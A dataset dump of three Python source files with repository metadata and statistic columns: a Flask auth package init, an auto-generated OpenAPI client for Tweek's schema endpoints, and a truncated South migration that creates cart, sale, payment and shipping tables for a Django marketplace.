| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06553f21352807ad358f166bcd4e25b74bb569b7
| 80
|
py
|
Python
|
app/auth/__init__.py
|
ethanaggor/twitter-clone
|
4b6dfadca462fbe73dd7a3f32001e04342e1e5fa
|
[
"Apache-2.0"
] | null | null | null |
app/auth/__init__.py
|
ethanaggor/twitter-clone
|
4b6dfadca462fbe73dd7a3f32001e04342e1e5fa
|
[
"Apache-2.0"
] | 12
|
2020-11-28T08:21:22.000Z
|
2020-12-17T17:49:22.000Z
|
app/auth/__init__.py
|
ethanaggor/twitter-clone
|
4b6dfadca462fbe73dd7a3f32001e04342e1e5fa
|
[
"Apache-2.0"
] | 4
|
2020-12-01T00:10:12.000Z
|
2020-12-16T12:45:41.000Z
|
from app.auth.blueprints import * # noqa
from app.auth.models import * # noqa
| 26.666667
| 41
| 0.725
| 12
| 80
| 4.833333
| 0.583333
| 0.241379
| 0.37931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 80
| 2
| 42
| 40
| 0.878788
| 0.1125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
067886a061b9ae08fda00ccdb502e1875cab4bb8
| 20,537
|
py
|
Python
|
clients/python/openapi_client/api/schema_api.py
|
Soluto/tweek-openapi-clients
|
feee32006743ea4bb815f2608bd95950439388c3
|
[
"Apache-2.0"
] | null | null | null |
clients/python/openapi_client/api/schema_api.py
|
Soluto/tweek-openapi-clients
|
feee32006743ea4bb815f2608bd95950439388c3
|
[
"Apache-2.0"
] | null | null | null |
clients/python/openapi_client/api/schema_api.py
|
Soluto/tweek-openapi-clients
|
feee32006743ea4bb815f2608bd95950439388c3
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Tweek
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
class SchemaApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_identity(self, identity_type, author_name, author_email, **kwargs): # noqa: E501
"""delete_identity # noqa: E501
Delete Schema # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity(identity_type, author_name, author_email, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identity_type: The type of the identity (required)
:param str author_name: (required)
:param str author_email: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_identity_with_http_info(identity_type, author_name, author_email, **kwargs) # noqa: E501
else:
(data) = self.delete_identity_with_http_info(identity_type, author_name, author_email, **kwargs) # noqa: E501
return data
def delete_identity_with_http_info(self, identity_type, author_name, author_email, **kwargs): # noqa: E501
"""delete_identity # noqa: E501
Delete Schema # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_with_http_info(identity_type, author_name, author_email, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identity_type: The type of the identity (required)
:param str author_name: (required)
:param str author_email: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['identity_type', 'author_name', 'author_email'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'identity_type' is set
if ('identity_type' not in local_var_params or
local_var_params['identity_type'] is None):
raise ValueError("Missing the required parameter `identity_type` when calling `delete_identity`") # noqa: E501
# verify the required parameter 'author_name' is set
if ('author_name' not in local_var_params or
local_var_params['author_name'] is None):
raise ValueError("Missing the required parameter `author_name` when calling `delete_identity`") # noqa: E501
# verify the required parameter 'author_email' is set
if ('author_email' not in local_var_params or
local_var_params['author_email'] is None):
raise ValueError("Missing the required parameter `author_email` when calling `delete_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identity_type' in local_var_params:
path_params['identityType'] = local_var_params['identity_type'] # noqa: E501
query_params = []
if 'author_name' in local_var_params:
query_params.append(('author.name', local_var_params['author_name'])) # noqa: E501
if 'author_email' in local_var_params:
query_params.append(('author.email', local_var_params['author_email'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/schemas/{identityType}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_schemas(self, **kwargs): # noqa: E501
"""get_schemas # noqa: E501
Get query # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_schemas(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[object]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_schemas_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_schemas_with_http_info(**kwargs) # noqa: E501
return data
def get_schemas_with_http_info(self, **kwargs): # noqa: E501
"""get_schemas # noqa: E501
Get query # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_schemas_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[object]
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_schemas" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/schemas', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[object]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schema_add_identity(self, identity_type, author_name, author_email, body, **kwargs): # noqa: E501
"""schema_add_identity # noqa: E501
Add identity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schema_add_identity(identity_type, author_name, author_email, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identity_type: (required)
:param str author_name: (required)
:param str author_email: (required)
:param object body: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.schema_add_identity_with_http_info(identity_type, author_name, author_email, body, **kwargs) # noqa: E501
else:
(data) = self.schema_add_identity_with_http_info(identity_type, author_name, author_email, body, **kwargs) # noqa: E501
return data
def schema_add_identity_with_http_info(self, identity_type, author_name, author_email, body, **kwargs): # noqa: E501
"""schema_add_identity # noqa: E501
Add identity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schema_add_identity_with_http_info(identity_type, author_name, author_email, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identity_type: (required)
:param str author_name: (required)
:param str author_email: (required)
:param object body: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['identity_type', 'author_name', 'author_email', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method schema_add_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'identity_type' is set
if ('identity_type' not in local_var_params or
local_var_params['identity_type'] is None):
raise ValueError("Missing the required parameter `identity_type` when calling `schema_add_identity`") # noqa: E501
# verify the required parameter 'author_name' is set
if ('author_name' not in local_var_params or
local_var_params['author_name'] is None):
raise ValueError("Missing the required parameter `author_name` when calling `schema_add_identity`") # noqa: E501
# verify the required parameter 'author_email' is set
if ('author_email' not in local_var_params or
local_var_params['author_email'] is None):
raise ValueError("Missing the required parameter `author_email` when calling `schema_add_identity`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `schema_add_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identity_type' in local_var_params:
path_params['identityType'] = local_var_params['identity_type'] # noqa: E501
query_params = []
if 'author_name' in local_var_params:
query_params.append(('author.name', local_var_params['author_name'])) # noqa: E501
if 'author_email' in local_var_params:
query_params.append(('author.email', local_var_params['author_email'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/schemas/{identityType}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schema_patch_identity(self, identity_type, author_name, author_email, patch_operation, **kwargs): # noqa: E501
"""schema_patch_identity # noqa: E501
Update identity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schema_patch_identity(identity_type, author_name, author_email, patch_operation, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identity_type: (required)
:param str author_name: (required)
:param str author_email: (required)
:param list[PatchOperation] patch_operation: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.schema_patch_identity_with_http_info(identity_type, author_name, author_email, patch_operation, **kwargs) # noqa: E501
else:
(data) = self.schema_patch_identity_with_http_info(identity_type, author_name, author_email, patch_operation, **kwargs) # noqa: E501
return data
def schema_patch_identity_with_http_info(self, identity_type, author_name, author_email, patch_operation, **kwargs): # noqa: E501
"""schema_patch_identity # noqa: E501
Update identity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schema_patch_identity_with_http_info(identity_type, author_name, author_email, patch_operation, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identity_type: (required)
:param str author_name: (required)
:param str author_email: (required)
:param list[PatchOperation] patch_operation: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['identity_type', 'author_name', 'author_email', 'patch_operation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method schema_patch_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'identity_type' is set
if ('identity_type' not in local_var_params or
local_var_params['identity_type'] is None):
raise ValueError("Missing the required parameter `identity_type` when calling `schema_patch_identity`") # noqa: E501
# verify the required parameter 'author_name' is set
if ('author_name' not in local_var_params or
local_var_params['author_name'] is None):
raise ValueError("Missing the required parameter `author_name` when calling `schema_patch_identity`") # noqa: E501
# verify the required parameter 'author_email' is set
if ('author_email' not in local_var_params or
local_var_params['author_email'] is None):
raise ValueError("Missing the required parameter `author_email` when calling `schema_patch_identity`") # noqa: E501
# verify the required parameter 'patch_operation' is set
if ('patch_operation' not in local_var_params or
local_var_params['patch_operation'] is None):
raise ValueError("Missing the required parameter `patch_operation` when calling `schema_patch_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identity_type' in local_var_params:
path_params['identityType'] = local_var_params['identity_type'] # noqa: E501
query_params = []
if 'author_name' in local_var_params:
query_params.append(('author.name', local_var_params['author_name'])) # noqa: E501
if 'author_email' in local_var_params:
query_params.append(('author.email', local_var_params['author_email'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'patch_operation' in local_var_params:
body_params = local_var_params['patch_operation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/schemas/{identityType}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.607884
| 145
| 0.635244
| 2,432
| 20,537
| 5.056743
| 0.064556
| 0.054643
| 0.086518
| 0.028623
| 0.945926
| 0.93812
| 0.931859
| 0.923727
| 0.912831
| 0.894454
| 0
| 0.016159
| 0.276817
| 20,537
| 481
| 146
| 42.696466
| 0.811877
| 0.299119
| 0
| 0.761719
| 1
| 0
| 0.211264
| 0.039537
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035156
| false
| 0
| 0.015625
| 0
| 0.101563
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2325aac1ee4d1ec9fb3983416b425abeb3fdb462
| 17,533
|
py
|
Python
|
stores/apps/sell/migrations/0001_initial.py
|
diassor/CollectorCity-Market-Place
|
892ad220b8cf1c0fc7433f625213fe61729522b2
|
[
"Apache-2.0"
] | 135
|
2015-03-19T13:28:18.000Z
|
2022-03-27T06:41:42.000Z
|
stores/apps/sell/migrations/0001_initial.py
|
dfcoding/CollectorCity-Market-Place
|
e59acec3d600c049323397b17cae14fdcaaaec07
|
[
"Apache-2.0"
] | null | null | null |
stores/apps/sell/migrations/0001_initial.py
|
dfcoding/CollectorCity-Market-Place
|
e59acec3d600c049323397b17cae14fdcaaaec07
|
[
"Apache-2.0"
] | 83
|
2015-01-30T01:00:15.000Z
|
2022-03-08T17:25:10.000Z
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ShippingData'
db.create_table('sell_shippingdata', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('street_address', self.gf('django.db.models.fields.CharField')(max_length=80, null=True, blank=True)),
('city', self.gf('django.db.models.fields.CharField')(max_length=80, null=True, blank=True)),
('state', self.gf('django.db.models.fields.CharField')(max_length=80, null=True, blank=True)),
('zip', self.gf('django.db.models.fields.CharField')(max_length=30, null=True, blank=True)),
('country', self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True)),
))
db.send_create_signal('sell', ['ShippingData'])
# Adding model 'Cart'
db.create_table('sell_cart', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('bidder', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('shippingdata', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['sell.ShippingData'], unique=True, null=True, blank=True)),
))
db.send_create_signal('sell', ['Cart'])
# Adding model 'CartItem'
db.create_table('sell_cartitem', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('cart', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sell.Cart'])),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=11, decimal_places=2)),
('qty', self.gf('django.db.models.fields.IntegerField')()),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['contenttypes.ContentType'])),
('object_id', self.gf('django.db.models.fields.PositiveIntegerField')()),
))
db.send_create_signal('sell', ['CartItem'])
# Adding model 'Sell'
db.create_table('sell_sell', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('bidder', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'], null=True)),
('completed', self.gf('django.db.models.fields.BooleanField')(default=False, blank=True)),
('closed', self.gf('django.db.models.fields.BooleanField')(default=False, blank=True)),
('shippingdata', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['sell.ShippingData'], unique=True, null=True, blank=True)),
))
db.send_create_signal('sell', ['Sell'])
# Adding model 'SellItem'
db.create_table('sell_sellitem', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('sell', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sell.Sell'])),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=11, decimal_places=2)),
('qty', self.gf('django.db.models.fields.IntegerField')()),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['contenttypes.ContentType'])),
('object_id', self.gf('django.db.models.fields.PositiveIntegerField')()),
))
db.send_create_signal('sell', ['SellItem'])
# Adding model 'Payment'
db.create_table('sell_payment', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('sell', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['sell.Sell'], unique=True)),
('total', self.gf('django.db.models.fields.DecimalField')(default='0.0', max_digits=11, decimal_places=2)),
('state_actual', self.gf('django.db.models.fields.related.OneToOneField')(related_name='payment_history', unique=True, null=True, to=orm['sell.PaymentHistory'])),
))
db.send_create_signal('sell', ['Payment'])
# Adding model 'PaymentHistory'
db.create_table('sell_paymenthistory', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('payment', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sell.Payment'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('state', self.gf('django.db.models.fields.CharField')(max_length=2)),
))
db.send_create_signal('sell', ['PaymentHistory'])
# Adding model 'Shipping'
db.create_table('sell_shipping', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('sell', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['sell.Sell'], unique=True)),
('state_actual', self.gf('django.db.models.fields.related.OneToOneField')(related_name='shipping_history', unique=True, null=True, to=orm['sell.ShippingHistory'])),
))
db.send_create_signal('sell', ['Shipping'])
# Adding model 'ShippingHistory'
db.create_table('sell_shippinghistory', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shipping', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sell.Shipping'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('state', self.gf('django.db.models.fields.CharField')(max_length=2)),
))
db.send_create_signal('sell', ['ShippingHistory'])
def backwards(self, orm):
# Deleting model 'ShippingData'
db.delete_table('sell_shippingdata')
# Deleting model 'Cart'
db.delete_table('sell_cart')
# Deleting model 'CartItem'
db.delete_table('sell_cartitem')
# Deleting model 'Sell'
db.delete_table('sell_sell')
# Deleting model 'SellItem'
db.delete_table('sell_sellitem')
# Deleting model 'Payment'
db.delete_table('sell_payment')
# Deleting model 'PaymentHistory'
db.delete_table('sell_paymenthistory')
# Deleting model 'Shipping'
db.delete_table('sell_shipping')
# Deleting model 'ShippingHistory'
db.delete_table('sell_shippinghistory')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'sell.cart': {
'Meta': {'object_name': 'Cart'},
'bidder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shippingdata': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['sell.ShippingData']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"})
},
'sell.cartitem': {
'Meta': {'object_name': 'CartItem'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sell.Cart']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '11', 'decimal_places': '2'}),
'qty': ('django.db.models.fields.IntegerField', [], {})
},
'sell.payment': {
'Meta': {'object_name': 'Payment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sell': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['sell.Sell']", 'unique': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'state_actual': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'payment_history'", 'unique': 'True', 'null': 'True', 'to': "orm['sell.PaymentHistory']"}),
'total': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '11', 'decimal_places': '2'})
},
'sell.paymenthistory': {
'Meta': {'object_name': 'PaymentHistory'},
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sell.Payment']"}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'sell.sell': {
'Meta': {'object_name': 'Sell'},
'bidder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shippingdata': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['sell.ShippingData']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']", 'null': 'True'})
},
'sell.sellitem': {
'Meta': {'object_name': 'SellItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '11', 'decimal_places': '2'}),
'qty': ('django.db.models.fields.IntegerField', [], {}),
'sell': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sell.Sell']"})
},
'sell.shipping': {
'Meta': {'object_name': 'Shipping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sell': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['sell.Sell']", 'unique': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'state_actual': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'shipping_history'", 'unique': 'True', 'null': 'True', 'to': "orm['sell.ShippingHistory']"})
},
'sell.shippingdata': {
'Meta': {'object_name': 'ShippingData'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'street_address': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'sell.shippinghistory': {
'Meta': {'object_name': 'ShippingHistory'},
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shipping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sell.Shipping']"}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
